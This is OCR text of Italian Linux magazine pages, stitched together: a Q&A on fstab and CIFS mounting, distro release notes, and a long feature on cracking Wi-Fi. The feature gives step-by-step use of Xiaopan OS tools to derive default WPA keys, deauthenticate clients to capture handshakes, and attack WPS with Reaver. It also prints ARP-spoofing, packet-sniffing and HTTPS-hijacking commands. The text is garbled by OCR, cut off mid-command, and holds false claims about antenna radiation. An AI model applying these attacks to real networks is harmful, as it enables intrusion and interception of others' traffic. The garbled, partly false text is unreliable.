- in caso di ntfs: mount -t nifs-3g /dev/sd* -0 rw /media/nomecartella 
- in caso di fat32: mount -t vfat /dev/sd* -0 rw /media/nomecartella 


Con questi comandi, però, il montaggio è solo temporaneo, per tale motivo va 
editato il file fstab in /ete altrimenti al riavvio rimarranno solo le cartelle cre- 
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ate in media le quali non essendo agganciate a nessun device file rimarranno 
desolatamente vuote. Per farlo apriamo, con un qualsiasi editor di testi e le cre- 
denziali da amministratore, il file fstab e aggiungiamo una nuova riga del tipo: 
/aev/sda8 /media/Linux3 ext3 defaults 0 lo) 
dove sda8 è solo un esempio così come il punto di montaggio /media/Linux3: 
si dovrà inserire la partizione di cui effettuarne il montaggio in maniera per- 
manente e il relativo punto di montaggio a seconda dei casì. A questo punto 
dovranno essere salvate le modifiche al file e assicurasi che al nuovo riavvio le 
partizioni vengano tutte montate nel percorso che è stato indicato. Terminiamo 
questo argomento aggiungendo una osservazione. Nei comandi vengono uti- 
lizzati i device file in /dev per l'identificazione delle partizioni. Più volte nella 
rivista (anche in questa rubrica) abbiamo messo l'accento sull'uso dell'UUID 
(Universally Unique IDentifier), un numero a 128 bit (16 byte) caratterizzato 
da 32 cifre esadecimali suddivise in cinque sezioni distinte separate dal carat- 
tere "-". In sostanza, un identificativo che permette di riconoscere esattamente 
quel dato file system legato a quella specifica partizione e questo indipendente- 
mente dal nome assegnato agli associati file di dispositivo i quali, tramite udev 
(www.freedesktop.org/software/systemd/liibudev/). Con un identificativo, 
indipendentemente dal riferimento assegnato da udev, il valore UUID rimane 
sempre lo stesso: molto comodo per non confondere le varie periferiche colle- 
gate al PC! Come fare per valutare l'UUID di una partizione? Ci viene in soc- 
corso il comando blkid, ad esempio blkid/dev/sdey dove x indica il disco e y il 
numero della partizione, il quale fornirà in uscita un dato valore, ad esempio: 


/dev/sda8: UUID="7a86flca-4436-41c3-b179-1 
720£39d65a9e" TYPE="ext4" PARTUUID="73636731-08" 


Altri comandi per identificare l'UUTD possono essere: 
udevadm info -q all -n /dev/sdxy | grep wuid 
hwinfo --block 


ls -1 /aev/disk/by-uuid 


A questo punto, nella riga del file fstab al posto del device file corrispondente 
(dev/sdxy) inseriremo il valore trovato: 


UUID=7a86flca-4d36-4103-b179-720£39d65a9e 


e in questo modo la partizione rimane univocamente identificata indipenden- 
temente dal riferimento dato da udev! Con il diffondersi di EFI (Extensible 


Firmware Interface) e delle partizioni GPT (GUID Partition Table), di cui 
abbiamo ne parlato diffusamente nel numero 146 di Linux Magazine (mese di 
copertina Aprile/Maggio 2013), in fstab è comparso anche il PARTUUTD il 
quale identifica una partizione GPT e, a differenza dell'UUID, non cambia se 
formattiamo la partizione con un differente file system. 


Distribuzioni/Fedora 


MONTAGGIO REMOTO ROUTER WI-FI 


DOMANDA » Attualmente il file fstab in /ete di una Fedora 20 XFCE a 
64 bit, al di là del montaggio delle usuali partizioni dell'hard disk, presen- 
ta la seguente riga: 


//192.168.1.2/shared /mnt/wifiUsb cifs 1 
username=fedora20xfce,password=PassWord 0 0 


che ho aggiunto al fine di condividere una memoria di massa (un hard 
disk) collegata alla porta USB di un Router Wi-Fi e di preciso il model- 
lo Technicolor TG582n. Tutto funziona bene, ma vorrei evitare di dover 
inserire all'interno di fstab le credenziali di accesso. In realtà il proble- 
ma nemmeno si porrebbe poiché, da una ricerca condotta su Internet, 
ho letto che le credenziali possono essere inserite in un file a parte, creato 
ad-hoc, previo utilizzo dell'opzione credentials all'interno del file fstab, 
nel modo seguente: 


credentials=/percorso/file/contenente/nomeutentel 


_e_password 


Allora ho provato a creare in /ete un file di nome credenziali il cui conte- 
nuto presenta le seguenti righe: 


username=fedora20xfce 


password=PassWord 
e ho modificato la riga in fstab in base alle nuove circostanze, ovvero: 


//192.168.1.2/shared /mnt/wifiUsb cifs 1 


credentials=/etc/credenziali o 0 


solo che con questa nuova configurazione la memoria di massa presente 
sulla porta USB del router, che in presenza della prima versione della riga 
(quella senza l'opzione credentials) viene montata senza problemi, è come 
se non venisse nemmeno vista! Dove sbaglio? 


SOLUZIONE e Un thread aperto dall'utente Sargon6 e che vede un fit- 
to scambio di messaggi e informazioni con oltre 40 post ai quali parteci- 
pano gli utenti Argos e michele.p. Per ovvi motivi di spazio non possiamo 
riportare ogni singola risposta, quindi gioco forza dobbiamo andare a ri- 
assumere negli aspetti principali la soluzione che ne è scaturita alla fine e 
che ha portato lo stesso utente Sargon6 a scrivere una guida riepilogativa 
al termine della discussione. Una caratteristica del router in questione è di 
consentire la condivisione dei contenuti memorizzati in una periferica di ar- 
chiviazione USB con altri utenti, in rete o anche di accedere a questi conte- 
nuti condivisi da Intemet grazie alla presenza di un server di rete integrato. 
Come riportato nel manuale l'accesso, lo si ottiene utilizzando un indiriz- 
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zo del tipo smb:/<indirizzo IP>. Questo comporta che sul proprio com- 
puter non occorre installare alcun server Samba ma è d'obbligo installare i 
componenti client di Samba al fine di accedere alle directory condivise in 
rete. Samba (www.samba.org), lo ricordiamo, è un progetto software per 
il protocollo SMB/CIFS che fomisce il supporto per la condivisione di 
file tra piattaforme con Microsoft Windows, OS X e altri sistemi UNIX. 
Da una prima analisi dell'output del comando dmesg veniva evidenziato il 
seguente problema: CIFS VFS: No username specified, presto risolto poiché 
dovuto alla mancanza del pacchetto cifs-utils il quale contiene diversi stru- 
menti per gestire in user-space il montaggio di file system di rete tramite CIFS 
(Common Internet File System — www.samba.org/cifs/). Eseguita l'installa- 
zione il montaggio remoto ancora non avveniva e il comando dmesg al termine 
del boot evidenziava un altro problema, di preciso: 


CIFS VFS: Error connecting to socket. Aborting operation. 
CIFS VFS: cifs mount failed w/return code = -101 


È stato suggerito allora di fare una prova: spostare il file delle credenziali 
nella home utente nominandolo come .credenziali (file nascosto). Fatto ciò, 
modificare anche la riga in fstab nel modo seguente: 


//192.168.1.2/shared /mnt/wifiusb cifs * 
credentials=/home/<nome utente>/.credenziali 0 0 


Al termine, verificare se il montaggio al termine dell'avvio si verificas- 
se o meno e in caso negativo, come poi è avvenuto, impartire il comando 
mount -a da utente amministratore: con questo comando il montaggio ve- 
niva eseguito senza problemi e pertanto il problema era da ricercarsi altrove. 
La precedente prova unitamente ai due errori riportati da dmesg ha condotto ad 
un possibile problema di tempistiche: in sostanza quando durante la sequenza 
di avvio il sistema tenta la connessione al router, la rete ancora non è attiva 
determinando così l'errore di connessione al socket con relativo timeout. Si è 
provato a ritardare la connessione via CIFS al router utilizzando un file re.local 
in /ete/re.d/ avente le seguenti righe: 


#!/bin/bash 
mount /mnt/wifiUsb 
exit 0 


Ma non è stata la soluzione definitiva poiché il montaggio veniva sì effettua- 
to, ma “random”: alcune volte si mentre altre non dava segni di vita. 

La prova ha permesso di indirizzare la ricerca su systemd (www.freede- 
sktop.org/wiki/Software/systemd/) e arrivare alla soluzione del problema 
che ha visto la semplice modifica del file /ete/fstab inserendo le opzioni no- 
auto, x-systemd e automount nella riga relativa al montaggio delle partizioni 
remote. La riga è così diventata: 
//192.168.1.2/shared /mnt/wifiUsb cifs noauto,x-1 
systemd.automount,credentials=/etc/credenziali (o) 


che ha risolto il problema dell'utente Sargon6 il quale ha creato anche una 
mini-guida pubblicata nella sezione FAQ del forum di Linux Magazine 
(www.linux-magazine.it/forum/index.php/topic,18500.0.htm]). 

Lo stesso utente Sargon6 ha sperimentato con successo la procedura utiliz- 
zando poi due differenti distribuzioni: Fedora 20 XFCE 64 bit e OpenSU- 
SE 13.1 KDE 64 bit. 
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PIÙ BELLA, PIÙ VELOCE, PIÙ COMPLETA! 
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Si c'è una distro che si distingue per stabilità, completézza 
e innovazione questa è openSUSE. E con questa nuova 
release 13.2 gli sviluppatori hanno introdotto, come al solito, 
numerose migliorie. A partire dal file system, che di default è 
BTRES. Grazie all’accoppiata con Snapper, gli utenti posso- 
no ora creare degli snapshot del sistema operativo, con una 
conseguente facilità di ripristino in caso di problematiche irri- 
solvibili (molto utile anche in ambito server), Gli sviluppatori 
hanno lavorato anche sui tempi di avvio della distro, introdu- 
cendo il nuovo tool Dracut che incrementa (e non di poco) 
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le prestazioni generali del sistema, Sul comparto grafico, gli 
ambienti desktop disponibili sono KDE 4.14 e GNOME 3.14 
ma sono disponibili anche soluzioni alternative come MATE | 
1.8.1, Xfce 4.10, LXDE 0.5.5, Enlightenment 19 e Awesome 
3.4.15. Con questo nuovo rilascio, gli sviluppatori hanno 
introdotto anche Wicked, un tool che guida gli utenti alla 
configurazione delle connessioni di rete, E poi ancora il kernel |. 
Linux 3.16 e aggiornamenti per tutti i pacchetti che stanno alla 
base della distro. Presente anche un nuovo installer grafico 
che semplifica ancor di più il setup di openSUSE 13,2. 
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Le distribuzioni principali presenti all'interno del DVD-Rom sono direttamente avviabili dal supporto digitale, quindi installabili o 
eseguibili i in modalità LIVE. Basta inserire il DVD-Rom nell apposito lettore e riavviare il PC. Dopo pochi secondi apparirà l'inter- 
faccia per l'avvio della distribuzione o per la sua esecuzione in modalità LIVE. Per tutte le altre basta seguire le seguenti istruzioni. 


L'INTERFACCIA 


Per le distribuzioni disponibili sotto forma di immagini ISO, apriamo il 
DVD-Rom con il file manager e clicchiamo due vole sul file index.htm. 
A questo punto, dovrebbe apparire l'interfaccia di gestione. Clicchiamo 
sull'illustrazione o sulla voce Distribuzioni presente nel menu a destra. 


QUI 4 
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DOWNLOAD ISO 


Da qui, possiamo scaricare l'immagine ISO della distribuzione semplice- 

mente accedendo alla sua eventuale cartella e premendo sul relativo link. 
Dopodiché, possiamo masterizzare l'ISO su Cd-Rom e DVD-Rom per crea- 
re il supporto di installazione o trasferirla su una pendrive USB bootable. 
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CENTOS 6.6 


({ Siamo lieti di annunciare l'immediata disponibilità di 

CentOS 6.6 per architetture a 32 e 64 bit. CentoOS 6.6 è 
basato sul codice sorgente rilasciato da Red Hat per Red Hat 
Enterprise Linux. Cî sono molti cambiamenti fondamentali in 
questa versione rispetto alle precedenti release del ramo 6 di 
CentOS.” Questo è quanto si legge nell'annuncio di rilascio 
ufficiale pubblicato da Johnny Hughes del team CentOS. E 
così, una nuova release stabile (qualche mese fa gli svilup- 
patori avevano pubblicato la release 7 ma, ricordiamo, che 
CentOS viene distribulta con diversi rami stabili) della distro 
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Progetti recenti 


perfetta per l'ufficio ha fatto il suo debutto ufficiale. Fra le 
novità più importanti segnaliamo una bella ripulita di siste- 
ma: per snellire l'intera distro, gli sviluppatori hanno fatto 
fuori tutti quei pacchetti ritenuti ormai obsoleti. Al tempo 
stesso sono state migliorate le traduzioni in varie lingue 
(principalmente inglese e tedesco). L'ambiente desktop è 
come al solito GNOME anche se gli utenti possono procedere 
all'installazione di una soluzione alternativa. Ciononostante, 
le principali novità di questa nuova CentOS 6.6 si apprezzano 
quando la si installa su una macchina server. 
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a tecnologia Wi-Fi è ormai tal- 

mente diffusa che molte perso- 

ne si ritrovano in casa un router 

wireless senza nemmeno saper- 
lo. È, ad esempio, il caso degli anziani, 
che accettano di passare al VoIP per le 
telefonate senza essere interessati a In- 
ternet: il gestore telefonico fornisce loro 
un router che, ovviamente, ha tra le varie 
funzioni anche il Wi-Fi. Per chi non lo sa- 
pesse, tutto quel che facciamo sul Web, 
come visitare i social network, controlla- 
re il conto corrente bancario, leggere la 
posta elettronica o acquistare dagli store 
on-line, passa attraverso queste scatolet- 
te nascoste in qualche punto della casa 0 
dell’ufficio. Chi riesce a entrare nella no- 
stra rete Wi-Fi, quindi, non soltanto può 
scroccarci la connessione ADSL, ma di 
fatto avrà accesso a tutta la nostra vita 
privata! La domanda che ciascuno di noi 
dovrebbe porsi, quindi, è: “quanto è sicu- 
ra questa tecnologia”? Fino a poco tempo 
fa i rischi che potevamo correre erano ab- 
bastanza limitati. Per attaccare il nostro 
router, infatti, un pirata doveva trovar- 
si fisicamente vicino a noi (ad esempio, 
un ragazzino posteggiato sotto casa col 
notebook sulle ginocchia poteva destare 
qualche sospetto); inoltre, erano richieste 
competenze tecniche non alla portata di 
tutti (Ia suite AirCrack, ad esempio, usata 
per crackare le reti senza fili, funzionava 
soltanto a riga di comando). Oggi, è tut- 
to cambiato! | pirati possono acquistare 
a poche decine di euro antenne Wi-Fi po- 
tentissime con le quali riescono a rilevare 
le reti wireless di un intero isolato: i tempi 
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Ecco come sfruttare le più recenti 
vulnerabilità in grado di scardinare le reti 
wireless... anche quelle distanti 10 km 


del “wardriving” in giro 

col notebook sono ormai fi- 

nitit E non solo: non devono nemmeno 
essere degli esperti di GNU/Linux! | nuo- 
vi sistemi operativi apparsi in Rete, come 
Xiaopan OS Pro e Beini, hanno infatti del- 
le interfacce grafiche che con un paio di 
clie consentono anche a un bambino di 
scardinare qualsiasi rete Wi-Fi. Pazzesco! 
Cio non può che farci riflettere sull'attuale 
sicurezza di ogni rete Wi-Fi: è necessario 
che qualcuno sviluppi dei protocolli di si- 
curezza ancor più robusti di quelli attuali, 
di modo che la privacy di tutti continui ad 
essere difesa. Ma ora è arrivato il momen- 
to di scoprirne di più: ecco la nostra in- 
Chiesta esclusiva... 


UNA FORZA BRUTALE! 


Diverse sono le tipologie di attacco che un pirata può sferrare 
alla nostra rete. Alcune sono abbastanza semplici e rudimen- 
tali, altre, invece, richiedono una conoscenza abbastanza ele- 
vata. Ciononostante, con i giusti tool, qualsiasi malintenziona- 
to può raggiungere, brevemente o dopo qualche settimana di 
attesa, il suo obiettivo. Fra gli attacchi più semplici, troviamo 
quello a dizionario. Di cosa si tratta? Con un attacco di questo 


COME ABBIAMO ESEGUITO | TEST? 
Prima di tutto, rispettiamo la legge! 


Le tecniche descritte nella nostra inchiesta sono state 
applicate a router di nostra proprietà. Nello specifico 
abbiamo eseguito un test ‘a doppio cieco”: una squadra ha 
costruito delle reti Wi-Fi con diversi tipi di sicurezza (WEP, 
\WPA/WPA2} e l'altra squadra ha cercato di forzarle utiliz- 
zando antenne potenziate (e non) e le nuove distribuzioni 
GNU/Linux dedicate al crack del Wi-Fi. Ovviamente, nes- 
suna delle due squadre sapeva cosa stesse facendo l'altra 
{per evitare di partire in qualche modo avvantaggiati). 
Questo simula la situazione tipica di un attacco reale, per- 
ché di solito pirati e vittime non si conoscono. Il risultato? 
Se fino a qualche anno fa era abbastanza complicato repe- 
rire e utilizzare gli strumenti necessari per penetrare 

in una rete Wi-Fi protetta, oggi è quasi banale. Se siamo 
curiosi di testare la sicurezza della nostra rete Wi-Fi, 
possiamo mettere in atto quando descritto nelle pagine 
seguenti per tentare di violare il nostro router; purché sia 
il router che la linea ADSL siano di nostra proprietà! Non 
dimentichiamo, infatti, che accedere alle reti Wi-Fi altrui 
senza autorizzazione è un reato perseguito penalmente 
dalla legge italiana (art.615-ter del Codice Penale). Si va 
in galera! 


un pirata non fa altro che provare tutte le possibili password 
necessarie per l'accesso ad una rete Wi-Fi, utilizzando parole 
di senso compiuto (che le persone usano per ricordarle più fa- 
cilmente). Un attacco di tipo brute force, invece, viene esegui- 
to provando tutte le combinazioni di lettere, numeri e simboli 
possibili, a prescindere dal fatto che abbiano senso o meno. Il 
vantaggio del brute force è che, prendendo in considerazione 
tutte le combinazioni possibili, l'attacco avrà certamente suc- 
cesso, mentre lo svantaggio è dato dalla grande quantità di 
tempo necessario a compiere un attacco di questo tipo. Molto 
dipende dalla difficoltà della chiave di accesso impostata sulla 
rete senza fili: è ovvio che la password "pippo", ad esempio, 
potrà essere scovata con una maggiore facilità rispetto ad una 
chiave abbastanza lunga costituita da caratteri alfanumerici 
maiuscoli e minuscoli e, magari, anche qualche carattere spe- 
ciale (ad esempio "@"). 

Tuttavia, gli attacchi a dizionario e quelli brute force sono prati- 
camente la stessa cosa: cambia soltanto il dizionario utilizzato, 
che nel primo caso contiene solo parole di senso compiuto, 
nel secondo qualsiasi combinazione di caratteri. 


COSA SERVE PER ATTACCARE UNA RETE? 


Un notebook (per avvicinarsi il più possibile alla vittima se non 
si dispone di un'antenna Wi-Fi potenziata), un adattatore Wi- 
Fi (quello integrato nel notebook o un dongle USB), XiaoPan 
OS PRO (il sistema operativo gratuito con dentro tutti gli stru- 
menti per il crack delle reti Wi-Fi), una pendrive da 4 GB (per 
fare il boot da USB di XiaoPan OS PRO), i file di testo (detti 
“dizionari”) con dentro le password più comuni (si scaricano 
da Internet o si possono creare ad hoc col PC) e un hard disk 
esterno (sul quale archiviare i dizionari, che possono pesare 
anche svariati GB). Questi sono gli strumenti del mestiere ne- 
cessari a portare a termine un attacco o, nel nostro caso, per 
testare a fondo la sicurezza della nostra rete senza fili. 

Per quanto riguarda l'hard disk USB con dentro i dizionari, è 
meglio fare alcune precisazioni. Anzitutto è altamente consi- 
gliato l'utilizzo di un'etichetta necessaria a riconoscerlo facil- 
mente quando collegato al PC e correttamente riconosciuto 
da Xiaopan (la distro, infatti, presenta tutti i dischi collegati al 
PC con la loro etichetta). 

Se il disco è senza nome, verrà presentato con il suo codice 
identificativo univoco (UUID), una sequenza di lettere e numeri 
abbastanza lunga che rende più difficile riconoscerlo a colpo 
sicuro (specialmente se al PC sono collegati altre periferiche 
di archiviazione di massa). Inoltre, la capienza del disco stesso 
deve essere sufficiente ad ospitare il dizionario che abbiamo 
intenzione di utilizzare. Maggiori saranno le dimensioni del 
dizionario stesso, superiori saranno le percentuali di riuscita 
del nostro test: è ovvio, infatti, che un dizionario che occupa 
soli pochi MB non conterrà lo stesso numero di parole chiave 
di un altro file dalle dimensioni ben superiori. Dunque, prima 
di iniziare la nostra opera, è meglio munirci delle migliori so- 
luzioni disponibili in Rete: con una piccola ricerca su Google 
scopriremo un mondo fino ad oggi quasi del tutto sconosciuto. 
Provare per credere. 
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PER IL PIRATA È TUTTO SEMPLICE! 


La maggior parte degli utenti italiani usa i router forniti 
dai provider. Alice, Fastweb, Infostrada e tanti altri gesto- 
ri ci inviano a casa un dispositivo già pronto all'uso. La 
preconfigurazione, che risulta tanto comoda, comporta 
anche una password predefinita. E, com'è ovvio intuire, 
le password predefinite non sono mai sicure! Esse, infat- 
ti, vengono calcolate tramite un particolare algoritmo: se 
i pirati lo scoprono possono calcolare la nostra password 
in un batter di ciglia. 

E, guarda caso, già da qualche anno i pirati hanno pro- 
prio scoperto gli algoritmi più usati dai provider italiani. 
Con il programma Ufo Wardriving è possibile calcolare 


I ferri del “mestiere”! 


le chiavi WPA della maggior parte dei router in circo- 
lazione (Alice e Fastweb primi fra tutti). Il calcolo vie- 
ne eseguito sulla base del nome (ESSID) della rete e 
sull'identificativo MAC Address del router, sfruttando i 
“Magic Numbers”, cioè dei numeri che mettono in rela- 
zione queste due informazioni e che variano da provi- 
der a provider e da un modello di router a un altro. Per 
usare Ufo Wardriving occorre eseguire il boot del PC 
con la chiavetta USB preparata con Xiaopan OS Pro. 
È sufficiente collegare la pendrive, accendere il PC e 
premere subito il tasto per il boot da USB (può essere 
ESC, F2, F10, F11, F12: varia a seconda della scheda 
madre installata nel computer). 


Procediamo al download di Xiaopan OS PRO e dei dizionari 
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LA GIUSTA DISTRO 
01 Raggiungiamo la pagina Web www.edmaster.it/ 
url/3753 e procediamo al download dei tre file .zip 
che compongono Xiaopan OS PRO. Al termine, estraiamo il 
file .zip.001 per ricomporre l'archivio. Otterremo così l'IS0 da 
scrivere sulla pendrive USB. 
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DIZIONARIO IN ITALIANO 

Per crackare le chiavi WPA si usa l'attacco a dizio- 

nario: occorre un elenco di possibili password da 
provare durante le fasi di crack. È possibile scaricarne uno 
in lingua italiana dal sito www.edmaster.it/url/3754 e salvarlo 
sul disco USB. 
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USB AVVIABILE! 

Per fare ciò, ci affideremo al valido tool Unetbootin. 

Se stiamo utilizzando Ubuntu, accediamo all'Ubuntu 
Software Center e scarichiamolo da qui. Altermine, avviamo il 
tool, indichiamo il percorso dell'ISO, l'unità USB collegata al 
PC e confermiamo con OK. 


È Itp iierackatation Agtiup rada 


evfrarkStation 


cai o RE sità 


CrackStation®s Password Cracking Dictionary 
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NON BASTANO MAI! 
04 Il dizionario con le parole più comuni in lingua italia- 
na potrebbe non essere sufficiente. Conviene quindi 
dotarsi di altri dizionari più completi come www.edmaster.it/ 
url/3755 e www.edmaster.it/url/3756. Questi file pesano rispetti- 
vamente 15 GB e 33 GB. 


SUPER ANTENNE DA 15 EURO! 


Se un pirata vuole crackare una rete Wi-Fi deve trovarsi nelle vicinanze del router. Esistono però delle antenne 
ad alta potenza, come la Kasens-990WG (www.edmaster.it/url/3758), che costa appena 15 euro ma che 
consente di raggiungere molti più router fino a una decina di Km di distanza. Si tratta di una normale anten- 
na Wi-Fi N (chip Ralink RT3070), ma con un sistema di amplificazione (60 dBi) del segnale decisamente 
migliore di quello adottato per le antenne Wi-Fi integrate nei PC. Attenzione, però: il limite, in Europa, è di 20 
dBm. | dBm totali vengono calcolati come somma tra i dBm puri dell'antenna più i dBi di amplificazione. Ad 
esempio, un'antenna con 17dBm e 2ABi ha una potenza totale di 19dBm. Ciò significa che la Kasens-990WG 
ha già un’amplificazione tre volte superiore al massimo consentito. Il suo utilizzo in Italia è quindi illegale (non 
il possesso). La potenza di questa antenna, in Watt, è più o meno di 6000mW e quindi potrebbe risultare 
persino pericolosa per la salute. Per dare una idea, questa antenna è un centinaio di volte meno potente 


dell’emettitore di un normale forno microonde. Si tratta di radiazioni che appartengono allo spettro infrarosso Fig.1 - Ecco l'antenna Wi-Fi 


e che provocano un'elevata vibrazione delle molecole scaldando dall'interno qualsiasi cosa contengano. 


Kasens-990WG 


Router e provider: WPA in chiaro! 


Ufo Wardriving, integrato in Xiaopan 0S PRO, scova le chiavi predefinite in 2 secondi! 


STRAND IS RR RS RZAVZI PRETI E PIT 


COME AMMINISTRARE 
Ufo Wardriving non è presente nel menu delle 
applicazioni di Xiaopan, ma si trova nella cartella 
Home. Dobbiamo però aprirla con i privilegi di root: clic- 
chiamo sulla cartella Home col tasto destro del mouse e 
scegliamo la voce Openfolder as Root. 
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AVVIO CON PYTHON 
[4] 3 Poiché si tratta di uno script Python, dobbiamo 
aprirlo con l'apposito interprete. Scegliamo 
quindi Python (v2.7). È importante selezionare la versione 
2.7 e non la 3, proprio perché Ufo Wardriving non è com- 
patibile con la versione più recente di Python. 


È 
} 
PulseAudio Volume Control ID | 
; Mi li 
Ù 
| 
È 
( Î 


UN SEMPLICE SCRIPT 

Ci verrà richiesta la password di root di Xiao- 

pan: digitiamo rocksolid. Accediamo alla directo- 
ry ufo-wardriving-4. Clicchiamo col tasto destro del mouse 
sul file ufo.py e scegliamo la voce di menu Openwith/Open 
With Other Application. 


SCANSIONE COMPLETA 
04 Quando il programma Ufo Wardriving si apre, 
basta premere i tasti Ctrl+S per far apparire lo 
scanner. Nella lista verranno presentate tutte le reti Wi- 
Fi identificate: un semplice doppio clic sulla nostra rete 
avvierà il calcolo della password di default. 
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Crack a portata di mouse! 


Un paio di clic e tanta pazienza: questi sono gli ingredienti per forzare qualsiasi WPA! 


Il programma Feeding Bottle si trova nel menu del- 

le applicazioni, sezione Internet, di Xiaopan. Per av- 
viarlo sono richiesti i privilegi di root: la password di root di 
Xiaopan è sempre rocksolid. Alla prima domanda del pro- 
gramma rispondiamo Yes. 


Ne TORZROROFIE PER 


Eseguiamo una scansione delle reti: prima selezio- 

niamo il tipo di cifratura (WPA/WPA2} e poi pre- 
miamo Scan. |l programma cercherà tutte le reti disponibili. 
Per ognuna vengono indicati i client connessi: selezioniamo il 
client con più pacchetti (packets). 


i 


Scelto il dizionario, l'attacco comincia. Per velocizzare 

la cattura dell'handshake facciamo saltare la connes- 
sione del client “vittima”: basta premere Deauth a intervalli di 
10-30 secondi finché non si ottiene l'handshake. Al termine, se la 
password è nel dizionario verrà trovata [WPA key found). 


Dobbiamo indicare quale interfaccia di rete voglia- 

mo utilizzare. Selezioniamo la scheda Wi-Fi che 
abbiamo inserito nel PC (presumibilmente wlan0) e attendia- 
mo che nella casella Messages appaia la scritta monitor mode 
enabled on mon0 (wlan0). 


{° Stoy hisiden files 


Selezionata la rete e il client “vittima” su cui lavorare 

(tutto di nostra proprietà!), premiamo Next. Per avviare 
ilcrack premiamo Start. Comparirà una nuova finestra: scriviamo 
/media/xiaopan/ ed entriamo nel disco che contiene i dizionari 
(preparati in precedenza) e selezioniamone uno. 


ATTENTI AL WPS! 


Inflator è un’altra interfaccia grafica semplificata, realiz- 
zata per il programma Reaver. Questo sfrutta un bug del 
sistema WPS: lo strumento per la connessione facilitata 
alle reti Wi-Fi. In teoria, il WPS dovrebbe semplificare la 
vita degli utenti. In realtà, però, ha una debolezza che 
rende i router vulnerabili agli attacchi dei pirati. Natu- 
ralmente, un attacco di questo tipo prevede che il pirata 
possa accedere fisicamente al router, perché deve po- 
ter premere il pulsante WPS posizionato su di esso (in 
caso contrario deve restare perennemente in attesa che 
la vittima prema il tasto WPS). Un pirata non può quindi 
entrare in questo modo nel nostro router domestico a di- 


{410235cb-9601-1b95-@_ 


minai 


) LINK ALLA LIBRERI 
Per avviare Inflator occorre creare il collegamento 
a una libreria chiamata libpcap. Apriamo Terminal 
Emulator e diamo il comando sudoln -s /usr/lib/i386-linux-gnu/ 
libpcap.so /usr/lib/i386-linux-gnu/libpcap.so.1. Lanciamo il pro- 


gramma con sudo /bin/inflator/inflator. 


Inftattr i.O(tor Rnaset 1.4) 


stanza, ma potrebbe accedere a una rete Wi-Fi aziendale 
(pensiamo anche ad un router ADSL in bella vista in un 
pub). Spesso, infatti, nelle aziende, nelle scuole, o in altri 
luoghi pubblici, le reti sono protette da password, ma i 
router Wi-Fi sono fissati a un muro e dunque visibili e fa- 
cilmente raggiungibili per un malintenzionato che voglia 
connettersi pur non conoscendo la chiave di accesso. 
In teoria, il bug del sistema WPS dovrebbe essere stato 
risolto nel 2011. Tuttavia, è sempre possibile che il rou- 
ter abbia ancora un firmware datato. Proprio per questo 
motivo è sempre altamente consigliato aggiornare con 
una certa frequenza il firmware del proprio router, sem- 
pre che sia sempre ancora in produzione! 


UO tor Roavwer vi. 


Inflator ci chiede di non crackare reti Wi-Fi che 

non ci appartengono. Poiché stiamo testando la 
sicurezza del nostro router premiamo tranquillamente Yes. 
Scegliamo poi l'interfaccia wireless su cui lavorare (wlan0). 
Attendiamo che venga abilitata la modalità monitor. 


Sono ora presenti tutta una serie di opzioni, che 

consentono di tenere in considerazione tutte le 
varie modalità WPS esistenti. Per cominciare, ci conviene 
lasciare non spuntate tutte le caselle e premere subito il 
pulsante Run per avviare la procedura di crack. 
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Comparirà la finestra di Reaver che si occupa di 

eseguire il crack. Se il router è vulnerabile, com- 
parirà la password di accesso, In caso contrario, è possibile 
chiudere Reaver e, tornando alla finestra precedente, mette- 


re la spunta a qualche casella riprovando ad avviare (Run). 
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reati; fico e quindi po re 
esst rci molte 


SCENDIAMO PIÙ A FONDO 


Per meglio comprendere quali siano le vulnerabilità utilizzate dai pirati per acce- 
dere ai router altrui, forse è meglio studiare un po' di teoria. Quando due com- 
puter comunicano (ad esempio il PC e il router) avviene uno scambio di richieste 
e risposte ARP (Address Resolution Protocol), tramite il quale ogni dispositivo sa 
con chi ha a che fare. Per esempio: A ha un indirizzo MAC 00:00:00:00:00:AA ed 
IP 192.168.1.3, mentre B è 00:00:00:00:00:BB con IP 192.168.1.5. Quando i due si- 
stemi cominciano a comunicare A invia a B la richiesta ARP: “chi è 192.168.1.5?". 
B risponderà “192.168.1.5 è 00:00:00:00:00:BB". Ovviamente, B farà lo stesso, 
ed entrambe registreranno le risposte ricevute nella ARP cache. In questo modo, 
ogni volta che A vorrà parlare con B andrà a leggere la propria cache e vedrà che 
deve contattare 00:00:00:00:00:BB. Ma c'è un problema: un dispositivo accette- 
rà una risposta ARP anche se non ha fatto alcuna domanda. 

Inoltre, nel sistema ARP una nuova risposta sostituisce sempre quella vecchia 
nella cache (se entrambe si riferiscono allo stesso IP). Ciò significa che mentre 
due PC stanno comunicando, un malintenzionato potrebbe inviare a uno dei due 
una risposta ARP appositamente costruita per sostituirsi all'interlocutore e rice- 
vere al posto suo tutte le informazioni che l'altro sistema sta inviando. Questa de- 
bolezza può essere sfruttata per realizzare un attacco Man In The Middle (MITM) 
con la tecnica dell’ARP spoof. In Xiaopan OS Pro è sufficiente avviare Terminal 
Emulator e digitare arspoof -i eth0 -t 192.168.1.3 192.168.1.1 dove 192.168.1.3 è il 
computer “vittima”, mentre l’altro è il router. Divenuto un MITM, il pirata può leg- 
gere tutta la comunicazione col comando tepdump -i wlan0 -X. 
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NATI PER CRACKARE! 


Ecco i dispositivi nati proprio con questi scopi 


Nel corso di questa 
inchiesta abbiamo 
riesumato un vecchio 
Wifi Robin {www.wifirobin. 
orgì, ormai sepolto negli 
armadietti del labo- 
ratorio di redazione. 

Si tratta di un gadget 
standalone, di circa 4 
anni fa, per crackare in 
automatico le reti WEP. 
Con la scusa dei test 

lo abbiamo rimesso in 
funzione e, incredibile, 
abbiamo constatato che 
c'è ancora tanta gen- 

te che usa chiavi WEP 
{che, ricordiamo, pos- 
sono essere craccate in” 
pochissimi minuti senza 
attacchi a dizionario)! 
Abbiamo quindi cercato 
in Rete una versione più 
evoluta e moderna del Wifi Robin che potesse craccare in automatico an- 
che le chiavi WPA caricando comodamente i dizionari tramite porta USB. 
Abbiamo così scoperto il Beini CP-150PJ [(www.edmaster.it/url/3763). 


PASSWORD RUBATE 


Il protocollo HTTPS viene utilizzato dai siti (store on-line, Fa- 
cebook, forum e altri servizio on-line) per cifrare la connes- 
sione. Tuttavia, un pirata che si trova nella nostra rete Wi-Fi 
può dirottare i pacchetti ARP (o TCP) e inoltrare le richieste 
HTTPS per intercettare tutta la nostra comunicazione. Per 
eseguire un attacco di HTTPS hijacking, dal Terminal Emu- 
lator di Xiaopan il pirata abilita il forwarding dei pacchetti sul 
proprio PC, in modo da essere un intermediario: echo “1” > / 
proc/sys/net/ipv4/ip_forward, suggerisce poi ad iptables di 
